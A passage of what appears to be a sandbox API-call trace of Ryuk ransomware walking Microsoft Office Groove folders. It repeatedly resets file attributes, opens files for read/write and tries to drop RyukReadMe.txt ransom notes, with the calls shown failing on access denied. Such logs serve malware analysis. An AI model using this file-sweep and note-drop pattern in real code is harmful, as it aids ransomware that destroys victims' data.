office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\policies.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.013] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.013] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.013] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt", dwFileAttributes=0x80) returned 0 [0137.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Process Library.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\process library.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.014] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.014] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.014] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt", dwFileAttributes=0x80) returned 0 [0137.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Status Report.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\status report.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.014] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.015] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt", dwFileAttributes=0x80) returned 0 [0137.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\Track Issues.fdt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\track issues.fdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.015] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.015] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.015] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0137.015] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.016] SetLastError (dwErrCode=0x0) [0137.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsTemplates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formstemplates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.019] GetLastError () returned 0x5 [0137.019] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.019] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.019] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.019] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 0 [0137.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsversion1warning.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.020] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.020] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.020] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.020] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewattachmenticons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.020] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.020] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.021] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.021] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewattachmenticonsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.021] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.021] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.022] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewFrame.html", dwFileAttributes=0x80) returned 0 [0137.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewframe.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.022] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.023] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormToolImages.jpg", dwFileAttributes=0x80) returned 0 [0137.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formtoolimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.023] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.024] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml", dwFileAttributes=0x80) returned 0 [0137.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.024] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\MENUS.JS", dwFileAttributes=0x80) returned 0 [0137.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\MENUS.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\menus.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.025] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.025] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.025] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\menu_arrow.gif", dwFileAttributes=0x80) returned 0 [0137.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\menu_arrow.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\menu_arrow.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.026] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.026] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SEARCH.GIF", dwFileAttributes=0x80) returned 0 [0137.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SEARCH.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\search.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.027] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.027] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.027] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SPACER.GIF", dwFileAttributes=0x80) returned 0 [0137.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SPACER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\spacer.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.028] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.028] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.028] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SUBMIT.JS", dwFileAttributes=0x80) returned 0 [0137.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\submit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.028] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.028] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.028] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\utilityfunctions.js", dwFileAttributes=0x80) returned 0 [0137.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\utilityfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.029] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.029] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.029] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.029] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\validation.js", dwFileAttributes=0x80) returned 0 [0137.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\validation.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.030] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.030] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.030] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.CSS", dwFileAttributes=0x80) returned 0 [0137.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.031] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.031] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.031] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.031] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO", dwFileAttributes=0x80) returned 0 [0137.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.032] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.032] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.032] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.032] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.032] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS", dwFileAttributes=0x80) returned 0 [0137.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.032] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.032] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.032] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.033] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF", dwFileAttributes=0x80) returned 0 [0137.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewby.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.033] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.033] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.033] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.033] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js", dwFileAttributes=0x80) returned 0 [0137.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewdblclick.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.034] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.034] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.034] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.034] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 0 [0137.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.035] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.035] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.035] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.035] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.035] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js", dwFileAttributes=0x80) returned 0 [0137.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewselectionchanged.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.035] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.036] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.036] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.036] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0137.036] SetLastError (dwErrCode=0x0) [0137.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.036] GetLastError () returned 0x5 [0137.036] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.036] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.036] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.036] SetLastError (dwErrCode=0x0) [0137.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.036] GetLastError () returned 0x5 [0137.036] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.036] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.036] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2d00 [0137.039] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.040] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.040] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ADD.GIF", 